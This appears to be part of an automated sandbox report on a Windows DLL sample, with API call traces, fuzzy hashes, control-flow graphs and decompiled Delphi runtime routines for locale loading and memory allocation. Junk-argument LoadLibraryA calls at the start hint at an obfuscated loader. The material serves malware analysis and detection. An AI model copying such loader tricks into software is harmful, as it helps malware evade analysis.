                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA8A
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA94
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA9E
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BAA8
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BAB2
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BABC
                          • LoadIconA.USER32(00000000,0000113C), ref: 0076BAC8
                          • StrokePath.GDI32(0000000C), ref: 0076BAEB
                          • VirtualAlloc.KERNELBASE(00000000,-0076FF10), ref: 0076BBBA
                          • VirtualAlloc.KERNELBASE(00000000,-0076FF10), ref: 0076BBE9
                          • StrokePath.GDI32(0000000C), ref: 0076BD1F
                          • StrokePath.GDI32(0000000C), ref: 0076BD35
                          • StrokePath.GDI32(0000000C), ref: 0076BD63
                          • StrokePath.GDI32(0000000C), ref: 0076BD6F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Load$Library$PathStroke$AllocVirtual$Icon
                          • String ID: (ep$)q$fadfadfadad$pp$qp$Tq
                          • API String ID: 140743564-3941014712
                          • Opcode ID: 73a1c4a0d0a2fe4dba764d39ffd4632cde6d97720ea9884f5434a6bbe118f757
                          • Instruction ID: 3024a1931c53d7d90b5b76919f5fbd46bd1a289e456f8357a46eae1555401427
                          • Opcode Fuzzy Hash: 73a1c4a0d0a2fe4dba764d39ffd4632cde6d97720ea9884f5434a6bbe118f757
                          • Instruction Fuzzy Hash: 487251B028C7C1DFC302B7BA9C2A9543BA85E537023189196FC92DE1E7C79E65958733
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 136 70557c-7055bd GetModuleFileNameA RegOpenKeyExA 137 7055ff-705642 call 7053c4 RegQueryValueExA 136->137 138 7055bf-7055db RegOpenKeyExA 136->138 143 705644-705660 RegQueryValueExA 137->143 144 705666-705680 RegCloseKey 137->144 138->137 139 7055dd-7055f9 RegOpenKeyExA 138->139 139->137 142 705688-7056b9 lstrcpyn GetThreadLocale GetLocaleInfoA 139->142 145 7057a2-7057a9 142->145 146 7056bf-7056c3 142->146 143->144 147 705662 143->147 149 7056c5-7056c9 146->149 150 7056cf-7056e5 lstrlen 146->150 147->144 149->145 149->150 151 7056e8-7056eb 150->151 152 7056f7-7056ff 151->152 153 7056ed-7056f5 151->153 152->145 155 705705-70570a 152->155 153->152 154 7056e7 153->154 154->151 156 705734-705736 155->156 157 70570c-705732 lstrcpyn LoadLibraryExA 155->157 156->145 158 705738-70573c 156->158 157->156 158->145 159 70573e-70576e lstrcpyn LoadLibraryExA 158->159 159->145 160 705770-7057a0 lstrcpyn LoadLibraryExA 159->160 160->145
                          C-Code - Quality: 69%
                          			E0070557C(intOrPtr __eax) {
                          				intOrPtr _v8;
                          				void* _v12;
                          				char _v15;
                          				char _v17;
                          				char _v18;
                          				char _v22;
                          				int _v28;
                          				char _v289;
                          				long _t44;
                          				long _t61;
                          				long _t63;
                          				CHAR* _t70;
                          				CHAR* _t72;
                          				struct HINSTANCE__* _t78;
                          				struct HINSTANCE__* _t84;
                          				char* _t94;
                          				void* _t95;
                          				intOrPtr _t99;
                          				struct HINSTANCE__* _t107;
                          				void* _t110;
                          				void* _t112;
                          				intOrPtr _t113;
                          
                          				_t110 = _t112;
                          				_t113 = _t112 + 0xfffffee0;
                          				_v8 = __eax;
                          				GetModuleFileNameA(0,  &_v289, 0x105);
                          				_v22 = 0;
                          				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                          				if(_t44 == 0) {
                          					L3:
                          					_push(_t110);
                          					_push(0x705681);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t113;
                          					_v28 = 5;
                          					_t8 =  &_v289; // 0xc085fee2
                          					E007053C4(_t8, 0x105);
                          					_t9 =  &_v28; // 0xc085ffe7
                          					_t10 =  &_v22; // 0xc085ffed
                          					_t11 =  &_v289; // 0xc085fee2
                          					if(RegQueryValueExA(_v12, _t11, 0, 0, _t10, _t9) != 0) {
                          						_t13 =  &_v28; // 0xc085ffe7
                          						_t14 =  &_v22; // 0xc085ffed
                          						if(RegQueryValueExA(_v12, E007057E8, 0, 0, _t14, _t13) != 0) {
                          							_v22 = 0;
                          						}
                          					}
                          					_v18 = 0;
                          					_pop(_t99);
                          					 *[fs:eax] = _t99;
                          					_push(E00705688);
                          					return RegCloseKey(_v12);
                          				} else {
                          					_t5 =  &_v12; // 0xc085fff7
                          					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019, _t5); // executed
                          					if(_t61 == 0) {
                          						goto L3;
                          					} else {
                          						_t6 =  &_v12; // 0xc085fff7
                          						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019, _t6); // executed
                          						if(_t63 != 0) {
                          							_push(0x105);
                          							_push(_v8);
                          							_push( &_v289);
                          							L007012A4();
                          							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                          							_t107 = 0;
                          							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                          								_t70 =  &_v289;
                          								_push(_t70);
                          								L007012AC();
                          								_t94 = _t70 +  &_v289;
                          								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                          									_t94 = _t94 - 1;
                          								}
                          								_t72 =  &_v289;
                          								if(_t94 != _t72) {
                          									_t95 = _t94 + 1;
                          									if(_v22 != 0) {
                          										_push(0x105 - _t95 - _t72);
                          										_push( &_v22);
                          										_push(_t95);
                          										L007012A4();
                          										_t107 = LoadLibraryExA( &_v289, 0, 2);
                          									}
                          									if(_t107 == 0 && _v17 != 0) {
                          										_push(0x105 - _t95 -  &_v289);
                          										_push( &_v17);
                          										_push(_t95);
                          										L007012A4();
                          										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                          										_t107 = _t78;
                          										if(_t107 == 0) {
                          											_v15 = 0;
                          											_push(0x105 - _t95 -  &_v289);
                          											_push( &_v17);
                          											_push(_t95);
                          											L007012A4();
                          											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                          											_t107 = _t84;
                          										}
                          									}
                          								}
                          							}
                          							return _t107;
                          						} else {
                          							goto L3;
                          						}
                          					}
                          				}
                          			}
                          0x0070557d
                          0x0070557f
                          0x00705587
                          0x00705598
                          0x0070559d
                          0x007055b6
                          0x007055bd
                          0x007055ff
                          0x00705601
                          0x00705602
                          0x00705607
                          0x0070560a
                          0x0070560d
                          0x00705614
                          0x0070561f
                          0x00705624
                          0x00705628
                          0x00705630
                          0x00705642
                          0x00705644
                          0x00705648
                          0x00705660
                          0x00705662
                          0x00705662
                          0x00705660
                          0x00705666
                          0x0070566c
                          0x0070566f
                          0x00705672
                          0x00705680
                          0x007055bf
                          0x007055bf
                          0x007055d4
                          0x007055db
                          0x00000000
                          0x007055dd
                          0x007055dd
                          0x007055f2
                          0x007055f9
                          0x00705688
                          0x00705690
                          0x00705697
                          0x00705698
                          0x007056ab
                          0x007056b0
                          0x007056b9
                          0x007056cf
                          0x007056d5
                          0x007056d6
                          0x007056e3
                          0x007056e8
                          0x007056e7
                          0x007056e7
                          0x007056f7
                          0x007056ff
                          0x00705705
                          0x0070570a
                          0x00705717
                          0x0070571b
                          0x0070571c
                          0x0070571d
                          0x00705732
                          0x00705732
                          0x00705736
                          0x0070574f
                          0x00705753
                          0x00705754
                          0x00705755
                          0x00705765
                          0x0070576a
                          0x0070576e
                          0x00705770
                          0x00705785
                          0x00705789
                          0x0070578a
                          0x0070578b
                          0x0070579b
                          0x007057a0
                          0x007057a0
                          0x0070576e
                          0x00705736
                          0x007056ff
                          0x007057a9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x007055f9
                          0x007055db

                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,0076C0A4), ref: 00705598
                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,0076C0A4), ref: 007055B6
                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,0076C0A4), ref: 007055D4
                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 007055F2
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0070563B
                          • RegQueryValueExA.ADVAPI32(?,007057E8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00705681,?,80000001), ref: 00705659
                          • RegCloseKey.ADVAPI32(?,00705688,00000000,?,?,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0070567B
                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00705698
                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 007056A5
                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 007056AB
                          • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 007056D6
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0070571D
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0070572D
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00705755
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00705765
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0070578B
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 0070579B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                          • API String ID: 1759228003-3917250287
                          • Opcode ID: db367bd9d18067696511da8a162b37f281131e46ed4567ed6ae760596650a38b
                          • Instruction ID: e064a6b381985c24d753151f465461eb95a8e0df4d6c16c25b9689752fbf2b6e
                          • Opcode Fuzzy Hash: db367bd9d18067696511da8a162b37f281131e46ed4567ed6ae760596650a38b
                          • Instruction Fuzzy Hash: 90513475A4065CFEEB21D6A4CC4AFEF77EC9B04744F8402A1B604E61C2E6B89E448F61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 161 705688-7056b9 lstrcpyn GetThreadLocale GetLocaleInfoA 162 7057a2-7057a9 161->162 163 7056bf-7056c3 161->163 164 7056c5-7056c9 163->164 165 7056cf-7056e5 lstrlen 163->165 164->162 164->165 166 7056e8-7056eb 165->166 167 7056f7-7056ff 166->167 168 7056ed-7056f5 166->168 167->162 170 705705-70570a 167->170 168->167 169 7056e7 168->169 169->166 171 705734-705736 170->171 172 70570c-705732 lstrcpyn LoadLibraryExA 170->172 171->162 173 705738-70573c 171->173 172->171 173->162 174 70573e-70576e lstrcpyn LoadLibraryExA 173->174 174->162 175 705770-7057a0 lstrcpyn LoadLibraryExA 174->175 175->162
                          C-Code - Quality: 61%
                          			E00705688() {
                          				void* _t28;
                          				void* _t30;
                          				struct HINSTANCE__* _t36;
                          				struct HINSTANCE__* _t42;
                          				char* _t51;
                          				void* _t52;
                          				struct HINSTANCE__* _t59;
                          				void* _t61;
                          
                          				_push(0x105);
                          				_push( *((intOrPtr*)(_t61 - 4)));
                          				_push(_t61 - 0x11d);
                          				L007012A4();
                          				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                          				_t59 = 0;
                          				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                          					L14:
                          					return _t59;
                          				} else {
                          					_t28 = _t61 - 0x11d;
                          					_push(_t28);
                          					L007012AC();
                          					_t51 = _t28 + _t61 - 0x11d;
                          					L5:
                          					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                          						_t51 = _t51 - 1;
                          						goto L5;
                          					}
                          					_t30 = _t61 - 0x11d;
                          					if(_t51 != _t30) {
                          						_t52 = _t51 + 1;
                          						if( *((char*)(_t61 - 0x12)) != 0) {
                          							_push(0x105 - _t52 - _t30);
                          							_push(_t61 - 0x12);
                          							_push(_t52);
                          							L007012A4();
                          							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                          						}
                          						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                          							_push(0x105 - _t52 - _t61 - 0x11d);
                          							_push(_t61 - 0xd);
                          							_push(_t52);
                          							L007012A4();
                          							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                          							_t59 = _t36;
                          							if(_t59 == 0) {
                          								 *((char*)(_t61 - 0xb)) = 0;
                          								_push(0x105 - _t52 - _t61 - 0x11d);
                          								_push(_t61 - 0xd);
                          								_push(_t52);
                          								L007012A4();
                          								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                          								_t59 = _t42;
                          							}
                          						}
                          					}
                          					goto L14;
                          				}
                          			}

                          0x00705688
                          0x00705690
                          0x00705697
                          0x00705698
                          0x007056ab
                          0x007056b0
                          0x007056b9
                          0x007057a2
                          0x007057a9
                          0x007056cf
                          0x007056cf
                          0x007056d5
                          0x007056d6
                          0x007056e3
                          0x007056e8
                          0x007056eb
                          0x007056e7
                          0x00000000
                          0x007056e7
                          0x007056f7
                          0x007056ff
                          0x00705705
                          0x0070570a
                          0x00705717
                          0x0070571b
                          0x0070571c
                          0x0070571d
                          0x00705732
                          0x00705732
                          0x00705736
                          0x0070574f
                          0x00705753
                          0x00705754
                          0x00705755
                          0x00705765
                          0x0070576a
                          0x0070576e
                          0x00705770
                          0x00705785
                          0x00705789
                          0x0070578a
                          0x0070578b
                          0x0070579b
                          0x007057a0
                          0x007057a0
                          0x0070576e
                          0x00705736
                          0x00000000
                          0x007056ff

                          APIs
                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00705698
                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 007056A5
                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 007056AB
                          • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 007056D6
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0070571D
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0070572D
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00705755
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00705765
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0070578B
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 0070579B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                          • API String ID: 1599918012-3917250287
                          • Opcode ID: c360a1373c19ce246717240d90a6a2305b5a62bcfa2bef53c1f06bb8dd55e30e
                          • Instruction ID: d0342caaaca52011e97f38a28fd09e14696a939130ace6d0857fa6bd4b4c68d3
                          • Opcode Fuzzy Hash: c360a1373c19ce246717240d90a6a2305b5a62bcfa2bef53c1f06bb8dd55e30e
                          • Instruction Fuzzy Hash: 7131A471E0065CEAEF25D6B8CC4AFEF77EC9B44340F8402A1A604E61C2E678DE848F50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 193 701524-701531 194 701533-701538 193->194 195 70153a-701540 193->195 196 701546-70155e VirtualAlloc 194->196 195->196 197 701560-701567 call 7013d8 196->197 198 701583-701586 196->198 200 70156c-70156e 197->200 200->198 201 701570-701581 VirtualFree 200->201 201->198
                          C-Code - Quality: 100%
                          			E00701524(void* __eax, void** __edx) {
                          				void* _t3;
                          				void** _t8;
                          				void* _t11;
                          				long _t14;
                          
                          				_t8 = __edx;
                          				if(__eax >= 0x100000) {
                          					_t14 = __eax + 0x0000ffff & 0xffff0000;
                          				} else {
                          					_t14 = 0x100000;
                          				}
                          				_t8[1] = _t14;
                          				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                          				_t11 = _t3;
                          				 *_t8 = _t11;
                          				if(_t11 != 0) {
                          					_t3 = E007013D8(0x76f5ec, _t8);
                          					if(_t3 == 0) {
                          						VirtualFree( *_t8, 0, 0x8000);
                          						 *_t8 = 0;
                          						return 0;
                          					}
                          				}
                          				return _t3;
                          			}

                          Instruction addresses for the listing above: 0x00701527, 0x00701531, 0x00701540, 0x00701533, 0x00701533, 0x00701533, 0x00701546, 0x00701553, 0x00701558, 0x0070155a, 0x0070155e, 0x00701567, 0x0070156e, 0x0070157a, 0x00701581, 0x00000000, 0x00701581, 0x0070156e, 0x00701586

                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0070182D), ref: 00701553
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0070182D), ref: 0070157A
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 3060a551ded02c54f0854ef9aa44341ab61884efc351139bedcc8574e58216ba
                          • Instruction ID: 9092272d3f871e3a26e295d7962e267335a30b5f12a446f16f52850968853610
                          • Opcode Fuzzy Hash: 3060a551ded02c54f0854ef9aa44341ab61884efc351139bedcc8574e58216ba
                          • Instruction Fuzzy Hash: 7EF02773B00320D7DB6059695C89B429AC49F85B90F980270F90DEF3C9C2A5CC0182A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 202 705340-70534e 203 705350-705367 GetModuleFileNameA call 70557c 202->203 204 70537b-705386 202->204 206 70536c-705373 203->206 206->204 207 705375-705378 206->207 207->204
                          C-Code - Quality: 100%
                          			E00705340(void* __eax) {
                          				char _v272;
                          				intOrPtr _t14;
                          				void* _t16;
                          				intOrPtr _t18;
                          				intOrPtr _t19;
                          
                          				_t16 = __eax;
                          				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                          					_t3 = _t16 + 4; // 0x700000
                          					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                          					_t14 = E0070557C(_t19); // executed
                          					_t18 = _t14;
                          					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                          					if(_t18 == 0) {
                          						_t5 = _t16 + 4; // 0x700000
                          						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                          					}
                          				}
                          				return  *((intOrPtr*)(_t16 + 0x10));
                          			}

                          Instruction addresses for the listing above: 0x00705348, 0x0070534e, 0x0070535a, 0x0070535e, 0x00705367, 0x0070536c, 0x0070536e, 0x00705373, 0x00705375, 0x00705378, 0x00705378, 0x00705373, 0x00705386

                          APIs
                          • GetModuleFileNameA.KERNEL32(00700000,?,00000105), ref: 0070535E
                            • Part of subcall function 0070557C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,0076C0A4), ref: 00705598
                            • Part of subcall function 0070557C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,0076C0A4), ref: 007055B6
                            • Part of subcall function 0070557C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,0076C0A4), ref: 007055D4
                            • Part of subcall function 0070557C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 007055F2
                            • Part of subcall function 0070557C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0070563B
                            • Part of subcall function 0070557C: RegQueryValueExA.ADVAPI32(?,007057E8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00705681,?,80000001), ref: 00705659
                            • Part of subcall function 0070557C: RegCloseKey.ADVAPI32(?,00705688,00000000,?,?,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0070567B
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Open$FileModuleNameQueryValue$Close
                          • String ID:
                          • API String ID: 2796650324-0
                          • Opcode ID: 1c333c546541f2b90816c7a902ffb1918a2617d41d5f359c28264f9ad83b6de8
                          • Instruction ID: 58e048cd4fc4bf00445bfca4260f9d6fa1e296296e9dcfcdcbfde27c30ea7239
                          • Opcode Fuzzy Hash: 1c333c546541f2b90816c7a902ffb1918a2617d41d5f359c28264f9ad83b6de8
                          • Instruction Fuzzy Hash: AEE06D71A00614CBCB10DE6C88C5A4773E8AB08794F000A51EC54CF286E3B4DD208BD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 230 7016b8-7016fc 231 70173a-701740 230->231 232 701742-701749 231->232 233 7016fe-701708 231->233 234 70170a 233->234 235 70170c-701710 233->235 234->235 236 701712 235->236 237 701716-701718 235->237 236->237 238 701738 237->238 239 70171a-70172c VirtualAlloc 237->239 238->231 239->238 240 70172e-701736 239->240 240->232
                          C-Code - Quality: 100%
                          			E007016B8(signed int __eax, void** __ecx, intOrPtr __edx) {
                          				signed int _v20;
                          				void** _v24;
                          				void* _t15;
                          				void** _t16;
                          				void* _t17;
                          				signed int _t27;
                          				intOrPtr* _t29;
                          				void* _t31;
                          				intOrPtr* _t32;
                          
                          				_v24 = __ecx;
                          				 *_t32 = __edx;
                          				_t31 = __eax & 0xfffff000;
                          				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                          				 *_v24 = _t31;
                          				_t15 = _v20 - _t31;
                          				_v24[1] = _t15;
                          				_t29 =  *0x76f5ec; // 0xa74124
                          				while(_t29 != 0x76f5ec) {
                          					_t7 = _t29 + 8; // 0x23f0000
                          					_t17 =  *_t7;
                          					_t8 = _t29 + 0xc; // 0x100000
                          					_t27 =  *_t8 + _t17;
                          					if(_t31 > _t17) {
                          						_t17 = _t31;
                          					}
                          					if(_t27 > _v20) {
                          						_t27 = _v20;
                          					}
                          					if(_t27 > _t17) {
                          						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                          						if(_t15 == 0) {
                          							_t16 = _v24;
                          							 *_t16 = 0;
                          							return _t16;
                          						}
                          					}
                          					_t29 =  *_t29;
                          				}
                          				return _t15;
                          			}

                          Instruction addresses for the listing above: 0x007016bf, 0x007016c3, 0x007016ca, 0x007016df, 0x007016e7, 0x007016ed, 0x007016f3, 0x007016f6, 0x0070173a, 0x007016fe, 0x007016fe, 0x00701701, 0x00701704, 0x00701708, 0x0070170a, 0x0070170a, 0x00701710, 0x00701712, 0x00701712, 0x00701718, 0x00701725, 0x0070172c, 0x0070172e, 0x00701734, 0x00000000, 0x00701734, 0x0070172c, 0x00701738, 0x00701738, 0x00701749

                          APIs
                          • VirtualAlloc.KERNEL32(023F0000,?,00001000,00000004), ref: 00701725
